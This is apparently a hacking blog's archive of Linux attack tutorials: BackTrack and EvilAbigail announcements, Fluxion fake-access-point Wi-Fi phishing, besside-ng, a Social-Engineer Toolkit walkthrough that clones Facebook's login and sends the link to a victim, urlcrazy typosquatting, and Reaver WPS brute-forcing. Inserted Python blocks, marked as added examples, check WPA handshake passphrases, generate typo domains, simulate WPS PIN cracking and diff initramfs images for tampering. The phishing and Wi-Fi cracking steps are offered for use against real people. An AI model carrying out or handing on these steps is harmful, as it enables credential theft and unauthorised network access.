Category Archives: (I) Linux Hacking

BackTrack 3 Final Hacking LiveCD Released For Download

If you don’t know, BackTrack 3 is a top-rated Linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform boots directly from the CD-ROM and is fully usable within minutes.


Back in January we mentioned that BackTrack 3 BETA had been released; the final version is now ready for download!

New Stuff in BackTrack 3

SAINT
SAINT has provided BackTrack users with a working version of SAINT, pending a free request through the SAINT website for an IP-range license valid for one year.

Maltego
The guys over at Paterva have created a special version of Maltego v2.0 with a community license especially for BackTrack users. We would like to thank Paterva for cooperating with us and allowing us to feature this amazing tool in BackTrack.

Nessus
Tenable would not allow for redistribution of Nessus on BackTrack 3.

Kernel
2.6.21.5. Yes, yes, stop whining... We had serious deliberations concerning the BT3 kernel. We decided not to upgrade to a newer kernel because the wireless injection patches for it were not fully tested and verified. We did not want to jeopardize the awesome wireless capabilities of BT3 for the sake of sexiness or slightly better hardware compatibility. All relevant security patches have been applied.


Tools
As usual, updated, sharpened, SVN’ed and armed to the teeth. This release we have some special features such as spoonwep, fastrack and other cool additions.

Availability

For the first time we distribute three different versions of BackTrack 3:

  • CD version
  • USB version
  • VMware version

You can download BackTrack 3 Final here:

Softpedia

EvilAbigail – Automated Evil Maid Attack For Linux

EvilAbigail is a Python-based tool that runs an automated Evil Maid attack against Linux systems that use an encrypted root filesystem: it backdoors the initrd, which lives on the unencrypted /boot partition outside the encrypted volume. An Evil Maid attack targets a computer that has been shut down and left unattended.


An Evil Maid attack is characterized by the attacker’s ability to physically access the target multiple times without the owner’s knowledge.


Scenarios

  • Laptop left powered off with full-disk encryption (FDE) enabled
  • Attacker boots from USB/CD/network
  • Script executes and backdoors the initrd (the initrd sits on the unencrypted /boot partition, so FDE does not protect it)
  • User returns to laptop, boots as normal
  • Backdoored initrd loads:
    • (Debian/Ubuntu/Kali) an .so file into /sbin/init on boot, dropping a shell
    • (Fedora/CentOS) an LD_PRELOAD .so via systemd’s DefaultEnvironment, loaded globally, dropping a shell
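The attack works because nothing on a stock install checks the initrd before it runs. The check a defender wants is a comparison of the current initrd against a known-good copy. The following is an added example, not EvilAbigail’s own code: it parses the newc cpio format that Linux initramfs images use, handles the gzip-compressed and concatenated layout (an uncompressed early-microcode archive followed by the compressed main archive), and diffs a baseline image against the current one so a modified init script or a dropped shared object shows up. The sample images and the file names in them (init, lib/evil.so and so on) are constructed for the demo and are not taken from any real distribution.

```python
"""Diff two Linux initramfs images to spot a backdoored initrd.

Added example for the EvilAbigail scenario above; it is not the tool's own
code. Assumes the usual initramfs layout: one or more newc-format cpio
archives back to back, each optionally gzip-compressed, with a compressed
archive running to the end of the image. The sample images, file names and
contents below are constructed for the demo."""
import gzip
import hashlib

NEWC_MAGIC = b"070701"
HEADER_LEN = 110            # ASCII header: 6-byte magic + 13 eight-hex-digit fields
GZIP_MAGIC = b"\x1f\x8b"
S_IFMT, S_IFREG = 0o170000, 0o100000


def _align4(n):
    return (n + 3) & ~3


def parse_initramfs(blob):
    """Return {path: (mode, sha256 hex)} for every regular file in the image."""
    data = bytes(blob)
    entries = {}
    pos = 0
    while pos < len(data):
        if data[pos:pos + 2] == GZIP_MAGIC:
            # the rest of the image is a compressed archive: inflate it in place
            data = data[:pos] + gzip.decompress(data[pos:])
            continue
        if data[pos] == 0:
            pos += 1                              # zero padding between archives
            continue
        if data[pos:pos + 6] != NEWC_MAGIC:
            raise ValueError("no newc cpio header at offset %d" % pos)
        fields = [int(data[pos + 6 + 8 * i:pos + 14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = fields[1], fields[6], fields[11]
        name_off = pos + HEADER_LEN
        name = data[name_off:name_off + namesize - 1].decode()   # drop trailing NUL
        data_off = _align4(name_off + namesize)                   # file data is 4-byte aligned
        content = data[data_off:data_off + filesize]
        pos = _align4(data_off + filesize)
        if name == "TRAILER!!!":
            continue                 # end of this archive; another may follow
        if (mode & S_IFMT) == S_IFREG:
            entries[name] = (mode, hashlib.sha256(content).hexdigest())
    return entries


def diff_initramfs(baseline_blob, current_blob):
    """Report paths that were added, removed, or whose mode/contents changed."""
    base, cur = parse_initramfs(baseline_blob), parse_initramfs(current_blob)
    return {
        "added": sorted(set(cur) - set(base)),
        "removed": sorted(set(base) - set(cur)),
        "changed": sorted(p for p in set(base) & set(cur) if base[p] != cur[p]),
    }


def build_newc(files):
    """Build a newc cpio archive from {path: (mode, bytes)}; used only to make fixtures."""
    out = bytearray()
    items = list(files.items()) + [("TRAILER!!!", (0, b""))]
    for ino, (path, (mode, content)) in enumerate(items, 1):
        name = path.encode() + b"\x00"
        # ino, mode, uid, gid, nlink, mtime, filesize, devmajor, devminor,
        # rdevmajor, rdevminor, namesize, check
        hdr = NEWC_MAGIC + b"".join(b"%08X" % v for v in
            (ino, mode, 0, 0, 1, 0, len(content), 0, 0, 0, 0, len(name), 0))
        out += hdr + name
        out += b"\x00" * (_align4(len(out)) - len(out))
        out += content
        out += b"\x00" * (_align4(len(out)) - len(out))
    return bytes(out)


# Constructed sample images: an uncompressed early-microcode archive followed
# by the gzip'd main initramfs. TAMPERED mirrors the Debian-style backdoor:
# init altered to preload a shared object that was not there before.
MICROCODE = build_newc({"kernel/x86/microcode/GenuineIntel.bin": (0o100644, b"\x01" * 64)})
CLEAN_FILES = {
    "init": (0o100755, b"#!/bin/sh\nexec /sbin/init\n"),
    "lib/libc.so.6": (0o100755, b"\x7fELF clean library"),
}
EVIL_FILES = dict(CLEAN_FILES)
EVIL_FILES["init"] = (0o100755, b"#!/bin/sh\nLD_PRELOAD=/lib/evil.so exec /sbin/init\n")
EVIL_FILES["lib/evil.so"] = (0o100755, b"\x7fELF backdoor")
BASELINE_IMAGE = MICROCODE + gzip.compress(build_newc(CLEAN_FILES))
TAMPERED_IMAGE = MICROCODE + gzip.compress(build_newc(EVIL_FILES))

if __name__ == "__main__":
    print(diff_initramfs(BASELINE_IMAGE, TAMPERED_IMAGE))
```

In practice you would feed it /boot/initrd.img-<version> and a copy (or the hash table) recorded while the machine was known-good, and run the check from trusted boot media rather than from the possibly backdoored system, which can lie about its own files. A changed init or an unexpected shared object is exactly the footprint the scenario above leaves.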

Supported Distros

  • Ubuntu 14.04.3
  • Debian 8.2.0
  • Kali 2.0
  • Fedora 23
  • CentOS 7

You can download EvilAbigail here:

EvilAbigail-master.zip

Or read more here.

How To Hack Wi-Fi Using the Social Engineering Tool Fluxion on Kali Linux

“Note:Please, Do Not Use This Method In Any Illegal Or Malicious Activities”

Requirements
1. Kali Linux operating system (download)
2. Fluxion tool (download)
3. Patience and presence of mind

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced penetration testing and security auditing. Kali ships with hundreds of penetration-testing tools, including social-engineering tools. Kali Linux is developed in a secure environment with only a small number of trusted people allowed to commit packages, and each package is digitally signed by its developer. Kali also has a custom-built kernel that is patched for 802.11 wireless injection; this was primarily added because the development team found they needed to do a lot of wireless assessments. It is open source and free to download.

What is Fluxion?

Fluxion is a social-engineering tool used in security testing and Wi-Fi network cracking. Instead of brute-forcing a WPA/WPA2 passphrase offline, it blends technical automation with social engineering to trick a user into handing over the Wi-Fi password in a matter of keystrokes, and it checks what the user typed against a captured handshake so a wrong password is rejected.

Steps To Go:-
1. Download and install the Kali Linux operating system.
2. Download Fluxion and extract it onto your Kali desktop (do not edit any file or folder).
3. Open a Kali Linux terminal window and type the following commands:
    “cd Desktop”
    “cd fluxion”
    “ls”
Note: you must be connected to the Internet for Fluxion to install its dependencies correctly.
    Then type “./fluxion.sh” and press Enter.
4. Select your language.
5. Select all channels.
6. Choose the network to attack.
7. Select “FakeAP”.
8. Press Enter to continue.
9. Select “aircrack-ng” as the handshake verification method.
10. Select “Deauth all”.

Wait for about 2 minutes while Fluxion captures the target’s WPA handshake. The handshake file does not contain the password itself: it holds the nonces exchanged by the client and the access point and a message integrity code keyed by material derived from the passphrase, which is enough to check a candidate password against it offline.
11. Then select “Check handshake”.
12. Then select “Create an SSL certificate”.
13. Choose “Web Interface”.

Then a window pops up showing the phishing page used for the attack. Fluxion ships with many phishing pages, and they can be edited to the user’s needs.
You can make your own phishing site, or if you want a custom one, mail me on Gmail.

Here is the catch: Fluxion keeps deauthenticating clients from the real access point and brings up a fake access point with the same name, so the victim ends up connecting to the fake AP created in the steps above.
Once the victim connects to our network, a captive-portal login page opens in the browser and the victim enters the Wi-Fi password there. The password reaches us through the phishing page hosted by Fluxion, which checks it against the captured handshake and stops the attack once a correct password has been entered.

[Screenshot: fake access point]

[Screenshot: phishing site]

I hope you have understood the concept of hacking Wi-Fi via Fluxion.

besside-ng: crack a WEP or WPA key without user intervention and collaborate with WPA cracking statistics

besside-ng – crack a WEP or WPA key without user intervention and collaborate with WPA cracking statistics 

SYNOPSIS

besside-ng [options] <interface>

DESCRIPTION

besside-ng is a tool which will crack all the WEP networks in range and log all the WPA handshakes. WPA handshakes can be uploaded to the online cracking service at wpa.darkircop.org. wpa.darkircop.org also provides useful statistics, based on user-submitted capture files, about the feasibility of WPA cracking.

-b <target mac>
Specifies the target’s BSSID
-s <WPA server>
Where to upload capture file for cracking. A good choice is wpa.darkircop.org
-c <chan>
Channel lock
-p <pps>
Packets per second to send (flood rate).
-W
Crack only WPA networks
-v
Verbose mode. Use -vv for more verbose output, -vvv for even more, and so on.
-h
Help screen
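What the Fluxion “Check handshake” step and the WPA handshakes besside-ng logs have in common is the offline check: a candidate passphrase is turned into a PMK, the PMK into a PTK, and the PTK’s first 16 bytes (the KCK) are used to recompute the MIC on a captured EAPOL-Key frame. If it matches, the passphrase is right. The block below is an added example, not code from Fluxion, besside-ng or aircrack-ng, written in Python to show that check. The SSID, MAC addresses, nonces and the EAPOL-Key frame are constructed for the demo with a known passphrase; a real check would read message 2 of the handshake out of the capture file.

```python
"""Verify a candidate Wi-Fi passphrase against a captured WPA2 4-way handshake.

Added example for the Fluxion "check handshake" step and for the WPA handshakes
besside-ng logs; not code from either tool or from aircrack-ng. The SSID, MACs,
nonces and EAPOL-Key frame below are constructed for the demo."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81    # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_kck(pmk, ap_mac, client_mac, anonce, snonce):
    """KCK = first 16 bytes of the PTK; the PTK input orders MACs and nonces by value."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, frame):
    """WPA2 (key descriptor v2): HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def passphrase_matches(passphrase, ssid, ap_mac, client_mac, anonce, snonce, frame):
    """True if the candidate passphrase reproduces the MIC carried in the captured frame."""
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def build_eapol_msg2(kck, snonce):
    """Construct handshake message 2 (client -> AP) with a valid MIC, for the fixture only."""
    body = struct.pack(">BHH", 2, 0x010A, 16)        # RSN descriptor, key info (v2, pairwise, MIC), key length
    body += struct.pack(">Q", 1)                       # replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)   # SNonce, key IV, RSC, key ID
    body += bytes(16)                                  # MIC placeholder
    body += struct.pack(">H", 0)                       # key data length (RSN IE omitted in the demo)
    frame = struct.pack(">BBH", 2, 3, len(body)) + body   # 802.1X v2, type 3 = EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


# Constructed fixture: what the "Check handshake" step would have captured.
SSID = "CoffeeShop"
AP_MAC = bytes.fromhex("00112233aabb")
CLIENT_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "latte-macchiato"
CAPTURED_MSG2 = build_eapol_msg2(
    derive_kck(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE),
    SNONCE)


def check_candidates(candidates, ssid=SSID, ap_mac=AP_MAC, client_mac=CLIENT_MAC,
                     anonce=ANONCE, snonce=SNONCE, frame=CAPTURED_MSG2):
    """Return the first candidate whose MIC matches the capture, or None (a phished
    password is just a one-entry candidate list; a wordlist is the besside-ng case)."""
    for pw in candidates:
        if passphrase_matches(pw, ssid, ap_mac, client_mac, anonce, snonce, frame):
            return pw
    return None


if __name__ == "__main__":
    print(check_candidates(["password", "coffeeshop", "latte-macchiato"]))
```

The 4096-round PBKDF2 per candidate is what makes wordlist cracking of WPA slow and why Fluxion prefers to ask the user; it also means the check only ever confirms or rejects a guess, it never recovers anything from the handshake on its own.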

How to hack Facebook using Kali Linux: Credential Harvester Attack

STEPS:

1. Boot Kali Linux on your machine and open a terminal.
2. Type this command in the Kali Linux terminal.
                    root@kali:~# setoolkit
3. Enter ‘y’ to agree to the Social-Engineer Toolkit terms and conditions.
4. Select the following options one by one from the menu:
                ‘1’ (Social-Engineering Attacks), then
                ‘2’ (Website Attack Vectors), then
                ‘3’ (Credential Harvester Attack), then
5. Type ‘2’ (Site Cloner)
          set:webattack> IP address for the POST back in harvesting: 192.168.x.xxx (your IP address)
          set:webattack> Enter the url to clone: www.fb.com
6. Go to Places > Computer > var > www and move the files SET wrote there into the html folder (/var/www/html is the Apache document root on current Kali), otherwise the cloned page is not served.
7. Shorten the link to your IP address (http://192.168.x.xxx/) with tinyurl.com and send it to the victim. A private 192.168.x.x address is only reachable from the same network; for a target elsewhere you need a public address or a port forward. When the victim opens the link and enters the login details, the username and password land in a harvester text file located at Places > Computer > var > www (SET also prints the captured fields to the terminal).

Install Kali Linux on Raspberry Pi 3: Creation of a Hacking Machine

INSTALLATION REQUIREMENTS :

DOWNLOAD LINKS :

STEPS:

1. Download all files from the above links.
2. Insert the SD card and open Win32DiskImager. Select the Kali Linux image file and the SD card, then click Write.
3. When writing has finished, insert the SD card into the Raspberry Pi and do the setup as shown.
4. Open Network Sharing and apply the settings as shown.
5. Open cmd and type arp -a. Note the Pi’s IP address.
6. Open PuTTY and configure it as shown. Log in as root, change the default password straight away, and regenerate the SSH host keys, since the image ships with pre-generated ones.
7. Commands to install a GUI:
     apt-get update
     apt-get install lxde
     apt-get install lightdm
8. Open Xming and type startlxde.
9. Successfully installed.

How to use urlcrazy in Kali Linux

Intro – URLCrazy is a tool that can generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. It generates 15 types of domain variants, knows over 8000 common misspellings, supports multiple keyboard layouts, can check if a typo is a valid domain, tests if domain typos are in use, and estimates the popularity of a typo.

How to open (GUI method):

Application → Kali Linux → Information Gathering → DNS Analysis → urlcrazy

Or open a terminal, type urlcrazy and hit Enter.

  • This command generates typo variants of a domain (character omissions, repeats and transpositions, wrong-key neighbours, swapped vowels, alternative TLDs and so on) and reports which of them resolve. Run it and look at the output yourself; the full listing is too long to show here.

Syntax – urlcrazy domain

Ex – urlcrazy www.google.com

  • This option also estimates the popularity of each typo domain.

Syntax – urlcrazy -p domainname

Ex – urlcrazy -p www.mcdonalds.com

  • This option also shows typo variants that are not valid domain names (they are hidden by default).

Syntax – urlcrazy -i domainname

Ex – urlcrazy -i www.mcdonalds.com

  • This option skips DNS resolution and just lists the typos.

Syntax – urlcrazy -r domainname

Ex – urlcrazy -r www.mcdonalds.com
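To see what the variant classes above actually produce, here is an added example, not urlcrazy’s code: it implements a handful of the fifteen variant types in Python with a small QWERTY adjacency map (an assumption; urlcrazy supports several layouts) and mirrors the -i option by hiding syntactically invalid labels unless asked to show them. It resolves nothing, so it runs offline; feed its output to urlcrazy or a resolver of your choice, or use it to pick defensive registrations.

```python
"""Generate typo-squat candidates for a domain, in the spirit of urlcrazy's
variant classes. Added example, not urlcrazy's code. The QWERTY map is a
small assumption-level subset; the "wrong TLD" list is illustrative."""
import re

QWERTY = {
    "q": "wa", "w": "qase", "e": "wsdr", "r": "edft", "t": "rfgy", "y": "tghu",
    "u": "yhji", "i": "ujko", "o": "iklp", "p": "ol",
    "a": "qwsz", "s": "awedxz", "d": "serfcx", "f": "drtgvc", "g": "ftyhbv",
    "h": "gyujnb", "j": "huikmn", "k": "jiolm", "l": "kop",
    "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb", "b": "vghn", "n": "bhjm", "m": "njk",
}
VOWELS = "aeiou"
TLD_SWAPS = ("com", "net", "org", "co", "cm", "om")   # commonly mistyped/alternate TLDs
LABEL_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def is_valid_label(label):
    """DNS label rules per component: letters, digits, hyphens; no leading/trailing hyphen; <= 63 chars."""
    return all(LABEL_RE.match(part) for part in label.split("."))


def typo_variants(domain, show_invalid=False):
    """Return {variant type: sorted candidate domains}; show_invalid mirrors urlcrazy -i."""
    host = domain.lower()
    if host.startswith("www."):
        host = host[4:]
    label, _, tld = host.rpartition(".")
    n = len(label)
    kinds = {
        "character omission": {label[:i] + label[i + 1:] for i in range(n)},
        "character repeat": {label[:i] + label[i] + label[i:] for i in range(n)},
        "transposition": {label[:i] + label[i + 1] + label[i] + label[i + 2:]
                          for i in range(n - 1)},
        "adjacent key": {label[:i] + k + label[i + 1:]
                         for i, c in enumerate(label) for k in QWERTY.get(c, "")},
        "vowel swap": {label[:i] + v + label[i + 1:]
                       for i, c in enumerate(label) if c in VOWELS for v in VOWELS if v != c},
        "missing dot": {"www" + label},
    }
    result = {}
    for kind, labels in kinds.items():
        result[kind] = sorted(l + "." + tld for l in labels
                              if l != label and (show_invalid or is_valid_label(l)))
    result["wrong tld"] = sorted(label + "." + t for t in TLD_SWAPS if t != tld)
    return result


def all_variants(domain, show_invalid=False):
    """Flat, de-duplicated candidate list across all variant types."""
    return sorted({d for cands in typo_variants(domain, show_invalid).values() for d in cands})


if __name__ == "__main__":
    for kind, cands in typo_variants("www.google.com").items():
        print("%-20s %d  e.g. %s" % (kind, len(cands), ", ".join(cands[:4])))
```

The counts grow quickly with label length, which is why urlcrazy resolves each candidate and ranks by popularity: the interesting output is the handful that already exist, not the full list.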

Ubertooth – Open Source Bluetooth Sniffer

Ubertooth is an open source Bluetooth sniffer and is essentially a development platform for Bluetooth experimentation. It runs best as a native Linux install and should work fine from within a VM.


Ubertooth ships with a capable BLE (Bluetooth Smart) sniffer and can sniff some data from Basic Rate (BR) Bluetooth Classic connections.


Features

The Ubertooth can capture and demodulate signals in the 2.4 GHz ISM band with a bandwidth of 1 MHz using frequency-shift keying or related modulation schemes.

This includes, but is not limited to:

  • Bluetooth Basic Rate packets
  • Bluetooth Low Energy (Bluetooth Smart)

The following may be possible:

  • 802.11 FHSS (1MBit)
  • Some proprietary 2.4GHz wireless devices

You can download Ubertooth here:

ubertooth-2017-03-R2.zip

Hacking router with Reaver, guide to brute forcing Wifi Protected Setup

I thought I would share how easy it is to take down a router that is vulnerable to WPS attacks, like my own. Reaver is an open source tool that brute-forces WPS (Wi-Fi Protected Setup). This is the PIN (usually printed on the bottom of your router) that you can use to authenticate other devices to your wireless network without typing in a password. With enough time, Reaver can crack this PIN and reveal the WPA or WPA2 password.
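Why “enough time” is hours rather than years, as an added illustration that is not Reaver’s code: a WPS PIN is eight digits of which the last is a checksum, and the registrar confirms the two halves separately (an M4 NACK means the first four digits are wrong; only once they are right does an M6 NACK report on the last three). An attacker therefore needs at most 10,000 + 1,000 = 11,000 attempts instead of 10^8. The MockRegistrar below stands in for the router and mirrors only that leak; the PIN 12345670 is the usual sample value, not any router’s real PIN.

```python
"""Why brute-forcing a WPS PIN takes hours, not years.

Added illustration for the Reaver post; not Reaver's code. MockRegistrar
stands in for the AP and reproduces only the M4/M6 information leak."""


def wps_pin_checksum(first_seven):
    """Checksum digit for the first seven digits of a WPS PIN (WPS spec algorithm)."""
    accum, n = 0, first_seven
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin):
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_pin_checksum(int(pin[:7]))


def make_pin(first4, last3):
    """Assemble a checksum-valid 8-digit PIN from its two halves."""
    body = "%04d%03d" % (first4, last3)
    return body + str(wps_pin_checksum(int(body)))


class MockRegistrar:
    """Stand-in for the router's WPS registrar: answers like the real M4/M6 exchange does."""

    def __init__(self, pin):
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin):
        self.attempts += 1
        first_ok = pin[:4] == self.pin[:4]                  # what the M4 response reveals
        second_ok = first_ok and pin[4:] == self.pin[4:]    # what M6 reveals, only after M4 passed
        return first_ok, second_ok


def brute_force(registrar):
    """Search the halves independently: at most 10,000 + 1,000 attempts, not 10^8."""
    first_half = None
    for a in range(10000):
        pin = make_pin(a, 0)               # any checksum-valid completion will do for the M4 test
        first_ok, second_ok = registrar.try_pin(pin)
        if second_ok:
            return pin
        if first_ok:
            first_half = a
            break
    if first_half is None:
        return None
    for b in range(1000):
        pin = make_pin(first_half, b)
        if registrar.try_pin(pin)[1]:
            return pin
    return None


def crack_demo(real_pin):
    """Run the attack against a mock registrar; returns (recovered pin, attempts used)."""
    registrar = MockRegistrar(real_pin)
    return brute_force(registrar), registrar.attempts


if __name__ == "__main__":
    print(crack_demo("12345670"))
```

Against a real router each attempt is a full WPS exchange taking a second or more, and many firmwares add lock-outs after a few failures, which is where the “couple of hours” in the walkthrough below comes from; the arithmetic, not the tooling, is the vulnerability.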

Getting Started
To get started you will need to be on Linux, you will need the aircrack-ng suite and Reaver installed, and your wireless NIC will need to be put into monitor mode. I’m using Ubuntu for this post from a friend’s computer. You’ll notice I’ve masked some personal details in the images below to hide my router details. I’ll explain as we move along.

In Ubuntu (Debian) you can install aircrack-ng and reaver just like you install everything else.

If you need to download, and need help installing Ubuntu, you can use this page for help.
http://www.ubuntu.com/download/desktop

Next you need to put your wireless card into monitor mode (mon0). I’m using an internal wireless card, so my wireless interface is wlan0; you can run ifconfig to check whether yours is wlan0 or wlan1. To put the interface into monitor mode you run airmon-ng from the aircrack-ng suite against it, which creates the mon0 interface.

Next you need to obtain the unique identifier (BSSID) of the router you wish to crack. Here’s a screenshot of me running airodump-ng to grab my access point’s BSSID. Masked for privacy reasons, but you get the point.

[Screenshot: airodump-ng output showing the access point’s BSSID (masked)]

If you like, you can use the tool wash to check whether WPS is enabled on the router in question. Notice that I used the argument --ignore-fcs in my syntax to hide any FCS errors. You can see from the picture below that WPS is enabled on the router found.

[Screenshot: wash output showing WPS enabled on the router]

Now you can start up reaver.

[Screenshot: starting reaver]

Now reaver runs for a while, trying to bruteforce the WPS pin.

[Screenshot: reaver in progress]

After about 2 hours, Reaver hits my PIN and gives up the password for the router. In the screenshot I re-run Reaver with my PIN supplied up front to save time. And that’s it. It’s that easy.

[Screenshot: password recovered]

If you need any help with the commands you can ask for help, or read the man pages.

Protecting yourself
The easiest way to protect yourself is to turn WPS off; however, some routers don’t have an option to turn it off, and some routers are still vulnerable even if the feature is turned off. Personally I would recommend using a third-party firmware on your router like DD-WRT. DD-WRT doesn’t support WPS, so no worries there.

Further reading:
If you’re looking to learn more about wireless hacking and Reaver, here are some links I would suggest.

http://www.aircrack-ng.org – aircrack suite
http://code.google.com/p/reaver-wps/ – Reaver webpage, which also has a point-and-click commercial version.